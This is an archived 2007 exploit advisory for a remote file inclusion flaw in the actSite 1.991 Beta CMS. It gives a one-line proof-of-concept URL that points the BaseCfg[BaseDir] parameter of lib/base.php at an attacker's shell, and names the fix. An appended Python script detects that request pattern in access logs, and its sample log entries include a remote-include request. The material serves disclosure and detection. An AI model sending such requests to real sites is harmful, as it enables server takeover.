actSite 1.991 Beta (base.php) Remote File Inclusion Vulnerability



EDB-ID: 4473
CVE: 2007-5175
OSVDB-ID: 38589
Author: DNX
Published: 2007-10-01
Verified: Verified

                             \#'#/
                             (-.-)
   ---------------------oOO---(_)---OOo--------------------
   | actSite v1.991 Beta (base.php) Remote File Inclusion |
   |                     coded by DNX                     |
   --------------------------------------------------------
[!] Discovered: DNX
[!] Vendor: http://www.actsite.de
[!] Detected: 02.09.2007
[!] Reported: 02.09.2007
[!] Remote: yes
[!] Background: actSite is a content management system based on PHP and MySQL
[!] Bug: $BaseCfg[BaseDir] in lib/base.php
[!] PoC:
    - http://[site]/[path]/lib/base.php?BaseCfg[BaseDir]=[shell]
[!] Solution: Install update to v1.995
# milw0rm.com [2007-10-01]
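
For defenders still running a pre-1.995 install, the request shape in the PoC line can be hunted in web server access logs. The following is an added example, not part of the original advisory or of actSite: it assumes combined-format logs, the function names are hypothetical, and the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request line inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Parameter named in the advisory, with optional quotes around the array key.
PARAM_RE = re.compile(r'^BaseCfg\[\s*[\'"]?BaseDir[\'"]?\s*\]$')
# Value that starts with a URL scheme (http:, ftp:, ...) or a //host form.
REMOTE_RE = re.compile(r'^(?:[a-z][a-z0-9+.-]+:|//)', re.IGNORECASE)

def classify(line):
    """Return None, 'override' or 'remote-include' for one log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith("/lib/base.php"):
        return None
    verdict = None
    # parse_qsl percent-decodes keys and values, so %5B/%5D forms match too.
    for key, value in parse_qsl(url.query, keep_blank_values=True):
        if PARAM_RE.match(key):
            if REMOTE_RE.match(value.strip()):
                return "remote-include"
            verdict = "override"  # parameter supplied by the client at all
    return verdict

def scan(lines):
    """Return (client, verdict) for every log line that hits the pattern."""
    hits = []
    for line in lines:
        verdict = classify(line)
        if verdict:
            hits.append((line.split(" ", 1)[0], verdict))
    return hits

# Constructed sample entries (documentation IP ranges and hostnames).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Oct/2007:10:00:00 +0000] "GET /cms/index.php?page=home HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Oct/2007:10:00:05 +0000] "GET /cms/lib/base.php'
    '?BaseCfg%5BBaseDir%5D=http://files.example.org/x.txt HTTP/1.1" 200 312',
    '198.51.100.7 - - [01/Oct/2007:10:00:09 +0000] "GET /cms/lib/base.php'
    '?BaseCfg[BaseDir]=/srv/www/cms/ HTTP/1.0" 200 298',
    '192.0.2.10 - - [01/Oct/2007:10:00:12 +0000] "GET /cms/lib/base.php HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for client, verdict in scan(SAMPLE_LOG):
        print(f"{verdict:15} {client}")
```

Access logs normally record only the query string, so a value sent in a POST body will not appear here; any hit on lib/base.php with this parameter is worth reviewing because legitimate page requests have no reason to set it.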





